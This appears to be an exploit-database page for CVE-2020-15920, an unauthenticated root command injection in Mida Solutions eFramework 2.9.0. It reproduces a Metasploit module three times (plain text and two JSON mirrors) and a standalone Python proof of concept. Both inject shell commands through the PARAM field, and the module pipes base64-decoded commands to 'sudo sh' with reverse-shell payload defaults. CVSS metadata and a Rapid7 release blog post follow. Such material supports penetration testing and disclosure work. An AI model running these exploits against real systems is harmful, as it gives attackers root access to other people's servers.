Mida Solutions eFramework ajaxreq.php Command Injection Exploit
2020-09-16T00:00:00
ID 1337DAY-ID-34943 Type zdt Reporter metasploit Modified 2020-09-16T00:00:00
Description
This Metasploit module exploits a command injection vulnerability in Mida Solutions eFramework version 2.9.0 and prior. The ajaxreq.php file allows unauthenticated users to inject arbitrary commands in the PARAM parameter to be executed as the apache user. The sudo configuration permits the apache user to execute any command as root without providing a password, resulting in privileged command execution as root. This module has been successfully tested on Mida Solutions eFramework-C7-2.9.0 virtual appliance.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Mida
Solutions eFramework version 2.9.0 and prior.
The `ajaxreq.php` file allows unauthenticated users to inject
arbitrary commands in the `PARAM` parameter to be executed as
the apache user. The sudo configuration permits the apache user
to execute any command as root without providing a password,
resulting in privileged command execution as root.
This module has been successfully tested on Mida Solutions
eFramework-C7-2.9.0 virtual appliance.
},
'License' => MSF_LICENSE,
'Author' =>
[
'elbae', # discovery and exploit
'bcoles', # Metasploit
],
'References' =>
[
['CVE', '2020-15920'],
['EDB', '48768'],
['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
],
'Payload' => { 'BadChars' => "\x00" },
'Targets' =>
[
[
'Linux (x86)', {
'Arch' => ARCH_X86,
'Platform' => 'linux',
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
}
}
],
[
'Linux (x64)', {
'Arch' => ARCH_X64,
'Platform' => 'linux',
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
],
[
'UNIX (cmd)', {
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
]
],
'Privileged' => true,
'DisclosureDate' => '2020-07-24',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 1,
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])
])
end
def check
res = execute_command('id')
unless res
return CheckCode::Safe('Connection failed')
end
unless res.body.include?('uid=')
return CheckCode::Safe('Target is not vulnerable')
end
CheckCode::Vulnerable
end
def execute_command(cmd, _opts = {})
vars_post = {
'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,
'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),
'vars_post' => vars_post
}, 5)
if res && !res.body.blank?
vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")
end
res
end
def exploit
if target.arch.first == ARCH_CMD
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 1_500, background: true)
end
end
end
{"id": "1337DAY-ID-34943", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Mida Solutions eFramework ajaxreq.php Command Injection Exploit", "description": "This Metasploit module exploits a command injection vulnerability in Mida Solutions eFramework version 2.9.0 and prior. The ajaxreq.php file allows unauthenticated users to inject arbitrary commands in the PARAM parameter to be executed as the apache user. The sudo configuration permits the apache user to execute any command as root without providing a password, resulting in privileged command execution as root. This module has been successfully tested on Mida Solutions eFramework-C7-2.9.0 virtual appliance.", "published": "2020-09-16T00:00:00", "modified": "2020-09-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/34943", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2020-15920"], "immutableFields": [], "lastseen": "2021-12-27T05:18:37", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-15920"]}, {"type": "exploitdb", "idList": ["EDB-ID:48768"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158991", "PACKETSTORM:159194"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A"]}], "rev": 4}, "score": {"value": 7.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-15920"]}, {"type": "exploitdb", "idList": ["EDB-ID:48768"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158991"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A"]}]}, "exploitation": null, "vulnersScore": 7.2}, "sourceHref": "https://0day.today/exploit/34943", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability in Mida\n Solutions eFramework version 2.9.0 and prior.\n\n The `ajaxreq.php` file allows unauthenticated users to inject\n arbitrary commands in the `PARAM` parameter to be executed as\n the apache user. The sudo configuration permits the apache user\n to execute any command as root without providing a password,\n resulting in privileged command execution as root.\n\n This module has been successfully tested on Mida Solutions\n eFramework-C7-2.9.0 virtual appliance.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'elbae', # discovery and exploit\n 'bcoles', # Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2020-15920'],\n ['EDB', '48768'],\n ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],\n ],\n 'Payload' => { 'BadChars' => \"\\x00\" },\n 'Targets' =>\n [\n [\n 'Linux (x86)', {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'UNIX (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2020-07-24',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 1,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])\n ])\n end\n\n def check\n res = execute_command('id')\n\n unless res\n return CheckCode::Safe('Connection failed')\n end\n\n unless res.body.include?('uid=')\n return CheckCode::Safe('Target is not vulnerable')\n end\n\n CheckCode::Vulnerable\n end\n\n def execute_command(cmd, _opts = {})\n vars_post = {\n 'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,\n 'PARAM' => \";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh\"\n }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),\n 'vars_post' => vars_post\n }, 5)\n\n if res && !res.body.blank?\n vprint_status(\"Command output: #{res.body.gsub(/<br>/, \"\\n\")}\")\n end\n\n res\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded)\n else\n execute_cmdstager(linemax: 1_500, background: true)\n end\n end\nend\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1645993281}}
{"packetstorm": [{"lastseen": "2020-09-16T15:36:37", "description": "", "published": "2020-09-16T00:00:00", "type": "packetstorm", "title": "Mida Solutions eFramework ajaxreq.php Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-15920"], "modified": "2020-09-16T00:00:00", "id": "PACKETSTORM:159194", "href": "https://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection', \n'Description' => %q{ \nThis module exploits a command injection vulnerability in Mida \nSolutions eFramework version 2.9.0 and prior. \n \nThe `ajaxreq.php` file allows unauthenticated users to inject \narbitrary commands in the `PARAM` parameter to be executed as \nthe apache user. The sudo configuration permits the apache user \nto execute any command as root without providing a password, \nresulting in privileged command execution as root. \n \nThis module has been successfully tested on Mida Solutions \neFramework-C7-2.9.0 virtual appliance. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'elbae', # discovery and exploit \n'bcoles', # Metasploit \n], \n'References' => \n[ \n['CVE', '2020-15920'], \n['EDB', '48768'], \n['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'], \n], \n'Payload' => { 'BadChars' => \"\\x00\" }, \n'Targets' => \n[ \n[ \n'Linux (x86)', { \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux (x64)', { \n'Arch' => ARCH_X64, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'UNIX (cmd)', { \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n] \n], \n'Privileged' => true, \n'DisclosureDate' => '2020-07-24', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path to eFramework', '/']) \n]) \nend \n \ndef check \nres = execute_command('id') \n \nunless res \nreturn CheckCode::Safe('Connection failed') \nend \n \nunless res.body.include?('uid=') \nreturn CheckCode::Safe('Target is not vulnerable') \nend \n \nCheckCode::Vulnerable \nend \n \ndef execute_command(cmd, _opts = {}) \nvars_post = { \n'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample, \n'PARAM' => \";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh\" \n} \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'), \n'vars_post' => vars_post \n}, 5) \n \nif res && !res.body.blank? \nvprint_status(\"Command output: #{res.body.gsub(/<br>/, \"\\n\")}\") \nend \n \nres \nend \n \ndef exploit \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager(linemax: 1_500, background: true) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159194/mida_solutions_eframework_ajaxreq_rce.rb.txt"}, {"lastseen": "2020-08-29T17:44:38", "description": "", "published": "2020-08-27T00:00:00", "type": "packetstorm", "title": "Mida eFramework 2.9.0 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-15920"], "modified": "2020-08-27T00:00:00", "id": "PACKETSTORM:158991", "href": "https://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution \n# Google Dork: Server: Mida eFramework \n# Date: 2020-08-27 \n# Exploit Author: elbae \n# Vendor Homepage: https://www.midasolutions.com/ \n# Software Link: http://ova-efw.midasolutions.com/ \n# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html \n# Version: <= 2.9.0 \n# CVE : CVE-2020-15920 \n \n \n#! /usr/bin/python3 \n# -*- coding: utf-8 -*- \n \nimport argparse \nimport requests \nimport subprocess \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \n \ndef print_disclaimer(): \nprint(\"\"\" \n--------------------- \nDisclaimer: \n1) For testing purpose only. \n2) Do not attack production environments. \n3) Intended for educational purposes only and cannot be used for law \nviolation or personal gain. \n4) The author is not responsible for any possible harm caused by this \nmaterial. \n---------------------\"\"\") \n \n \ndef print_info(): \nprint(\"\"\" \n[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920) \n[*] Reference: \nhttps://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html \n[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability \n(RCE) in PDC/ajaxreq.php \nVersion\\t< 2.9.0\\t./CVE-2020-15920 \nhttp://192.168.1.60:8090/PDC/ajaxreq.php id \nVersion\\t2.9.0\\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php \nid \"\"\") \n \ndef pwn(url,cmd): \nrunning = \"\"\" \n[*] Target URL: {0} \n[*] Command: {1} \n\"\"\" \nprint(running.format(url,cmd)) \ndata = { \n\"DIAGNOSIS\":\"PING\", \n\"PARAM\":\"127.0.0.1 -c 0; {0}\".format(cmd) \n} \nr = requests.post(url,data=data,verify=False) \nline = \"[*]\"+\"-\"*20+\" Output \" + \"-\" *20 +\"[*]\" \npretty_output = r.text.replace('<br>','\\n') \nprint(line+\"\\n{0}\\n\".format(pretty_output)+line) \n \ndef main(): \nprint_info() \nprint_disclaimer() \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", type=str, help=\"the complete target URL\") \nparser.add_argument(\"cmd\", type=str, help=\"the command you want to run\") \nargs = parser.parse_args() \npwn(args.target, args.cmd) \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158991/midaeframework290-exec.txt"}], "cve": [{"lastseen": "2022-03-23T14:01:33", "description": "There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T01:15:00", "type": "cve", "title": "CVE-2020-15920", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15920"], "modified": "2020-09-16T17:15:00", "cpe": ["cpe:/a:midasolutions:eframework:2.9.0"], "id": "CVE-2020-15920", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15920", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:midasolutions:eframework:2.9.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:30:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-27T00:00:00", "type": "exploitdb", "title": "Mida eFramework 2.9.0 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15920", "2020-15920"], "modified": "2020-08-27T00:00:00", "id": "EDB-ID:48768", "href": "https://www.exploit-db.com/exploits/48768", "sourceData": "# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution\r\n# Google Dork: Server: Mida eFramework\r\n# Date: 2020-08-27\r\n# Exploit Author: elbae\r\n# Vendor Homepage: https://www.midasolutions.com/\r\n# Software Link: http://ova-efw.midasolutions.com/\r\n# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html\r\n# Version: <= 2.9.0\r\n# CVE : CVE-2020-15920\r\n\r\n\r\n#! /usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport argparse\r\nimport requests\r\nimport subprocess\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n\r\ndef print_disclaimer():\r\n print(\"\"\"\r\n ---------------------\r\n Disclaimer:\r\n 1) For testing purpose only.\r\n 2) Do not attack production environments.\r\n 3) Intended for educational purposes only and cannot be used for law\r\nviolation or personal gain.\r\n 4) The author is not responsible for any possible harm caused by this\r\nmaterial.\r\n ---------------------\"\"\")\r\n\r\n\r\ndef print_info():\r\n print(\"\"\"\r\n[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)\r\n[*] Reference:\r\nhttps://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html\r\n[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability\r\n(RCE) in PDC/ajaxreq.php\r\n Version\\t< 2.9.0\\t./CVE-2020-15920\r\nhttp://192.168.1.60:8090/PDC/ajaxreq.php id\r\n Version\\t2.9.0\\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php\r\nid \"\"\")\r\n\r\ndef pwn(url,cmd):\r\n running = \"\"\"\r\n[*] Target URL: {0}\r\n[*] Command: {1}\r\n \"\"\"\r\n print(running.format(url,cmd))\r\n data = {\r\n \"DIAGNOSIS\":\"PING\",\r\n \"PARAM\":\"127.0.0.1 -c 0; {0}\".format(cmd)\r\n }\r\n r = requests.post(url,data=data,verify=False)\r\n line = \"[*]\"+\"-\"*20+\" Output \" + \"-\" *20 +\"[*]\"\r\n pretty_output = r.text.replace('<br>','\\n')\r\n print(line+\"\\n{0}\\n\".format(pretty_output)+line)\r\n\r\ndef main():\r\n print_info()\r\n print_disclaimer()\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"target\", type=str, help=\"the complete target URL\")\r\n parser.add_argument(\"cmd\", type=str, help=\"the command you want to run\")\r\n args = parser.parse_args()\r\n pwn(args.target, args.cmd)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48768", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-09-29T08:39:07", "description": "## Refreshingly configurable\n\n\n\nF5, on top of being a handy shortcut you can press over and over again until 3am just to watch the RTX 3080 preorders sell out instantly, is also a company that specializes in the delivery, security, performance, and availability of web applications, computing, storage, and network resources.\n\nCommunity contributor [h00die](<https://github.com/h00die>) added support to msfconsole that allows the processing of F5 device config processing library, as well as a post module that can gather information on F5 devices, and an auxiliary module capable of processing F5 config files offline.\n\n## The Mida(s) Touch, but for vulns\n\nA new exploit added by [bcoles](<https://github.com/bcoles>) takes advantage of an OS command injection vulnerability in the Mida Solutions eFramework developed (shockingly) by Mida Solutions, a Unified Communication compant.\n\nShell commands can be executed as the `apache` user without authentication via the `PARAM` parameter in requests made to `ajaxreq.php`. The `sudo` configuration also allows the `apache` user to execute commands without requiring a password, making code execution as the `root` user possible.\n\n## The V stands for Vuln\n\nOur very own [Grant Wilcox](<https://github.com/gwillcox-r7>) put together a neat post module for Windows machines running Hyper-V that allows the enumeration of any Hyper-V Virtual Machines installed on said machine.\n\nThe findings of this module (status, CPU usage, Hyper-V engine version, and state) are then entered into the metasploit `loot`, for easy export and retrieval.\n\n## Multiple logins with Zerologon\n\nLast but certainly not least, the gnarly ["Zerologon"](<https://www.secura.com/pathtoimg.php?id=2055>) ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)) privilege escalation vulnerability already has a [PR in the works](<https://github.com/rapid7/metasploit-framework/pull/14151>) courtesy of the always wonderful [zeroSteiner](<https://github.com/zeroSteiner>).\n\nFor more information on the vulnerability that everyone's talking about, see our [analysis on AttackerKB](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog#rapid7-analysis>).\n\n## New modules (6)\n\n * [Mida Solutions eFramework ajaxreq.php Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14074>) by bcoles and elbae, which exploits [CVE-2020-15920](<https://attackerkb.com/topics/Hnbafc8Cw2/cve-2020-15920?referrer=search>)\n * [Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE](<https://github.com/rapid7/metasploit-framework/pull/14126>) by wvu and mr_me, which exploits [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>)\n * [F5 Configuration Importer](<https://github.com/rapid7/metasploit-framework/pull/14031>) by h00die\n * [F5 Device General Information Gatherer](<https://github.com/rapid7/metasploit-framework/pull/14031>) by h00die\n * [Bypass the macOS TCC Framework](<https://github.com/rapid7/metasploit-framework/pull/13942>) by mattshockl and timwr, which exploits [CVE-2020-9934](<https://attackerkb.com/topics/vwxuFjGw0v/cve-2020-9934---macos-transparency-consent-and-control-tcc-framework-bypass?referrer=blog>)\n * [Windows Hyper-V VM Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14117>) by gwillcox-r7\n\n## Enhancements and features\n\n * PR [#14139](<https://github.com/rapid7/metasploit-framework/pull/14139>) \\- This updates the HTTP client library that is used by many Metasploit modules to be more compliant across standards in regards to redirection handling while also adding a new feature to more easily manage cookies.\n\n * PR [#14126](<https://github.com/rapid7/metasploit-framework/pull/14126>) \\- This adds an authenticated RCE exploit for Microsoft Exchange which leverages the flaw identified as [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>) to inject code when processing a new DLP policy. The user must have the "Data Loss Prevention" role assigned in order to exploit this vulnerability.\n\n * PR [#14125](<https://github.com/rapid7/metasploit-framework/pull/14125>) \\- Adds SCREEN_EFFECTS and ARTIFACTS_ON_DISK notes to the `post/osx/escalate/tccbypass` module.\n\n * PR [#14117](<https://github.com/rapid7/metasploit-framework/pull/14117>) \\- This adds a post module that checks if a target is a Hyper-V host and attempt to gather information about all Hyper-V VMs.\n\n * PR [#14074](<https://github.com/rapid7/metasploit-framework/pull/14074>) \\- This adds an exploit for Mida Solutions eFramework versions `2.9.0` and below. Shell commands can be executed as the `apache` user via the `PARAM` parameter in requests to `ajaxreq.php` without authentication. Because the `sudo` configuration allows the `apache` user to execute commands without requiring a password, this vector ultimately achieves code execution as the `root` user.\n\n * PR [#13942](<https://github.com/rapid7/metasploit-framework/pull/13942>) \\- This PR adds a module to leverage CVE-2020-9934 to allow a session to bypass the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data.\n\n * PR [#13571](<https://github.com/rapid7/metasploit-framework/pull/13571>) \\- This updates the Session Notifier plugin to support sending notifications using DingTalk webhooks.\n\n * PR [#14111](<https://github.com/rapid7/metasploit-framework/pull/14111>) \\- Removes dead code that previously tracked payload sizes when Metasploit was booting up.\n\n## Bugs fixed\n\n * PR [#14145](<https://github.com/rapid7/metasploit-framework/pull/14145>) \\- A bug within the implementation of the `report_loot` method has been fixed to ensure that data is always base64 encoded prior to sending it to the web service, which always expects base64 encoded data. Application of this fix ensures that `report_loot` will not send any unencoded data which could cause an exception.\n\n * PR [#14143](<https://github.com/rapid7/metasploit-framework/pull/14143>) \\- This update replaces all calls to the depreciated `get_service` function with calls to the more modern function known as `services`. This solves some known issues related to existing `get_service` calls that affected modules `badblue_passthru` and `tomcat_mgr_upload` when connected to a remote database.\n\n * PR [#14120](<https://github.com/rapid7/metasploit-framework/pull/14120>) \\- Fixes bug that caused `services -S` to return results from all workspaces, instead of the current workspace.\n\n * PR [#14138](<https://github.com/rapid7/metasploit-framework/pull/14138>) \\- Fixes `nexus_repo_manager_el_injection.md`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.6...6.0.7](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-10T13%3A10%3A53-05%3A00..2020-09-17T11%3A03%3A21-05%3A00%22>)\n * [Full diff 6.0.6...6.0.7](<https://github.com/rapid7/metasploit-framework/compare/6.0.6...6.0.7>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-09-18T18:28:37", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15920", "CVE-2020-16875", "CVE-2020-9934"], "modified": "2020-09-18T18:28:37", "id": "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "href": "https://blog.rapid7.com/2020/09/18/untitled-6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
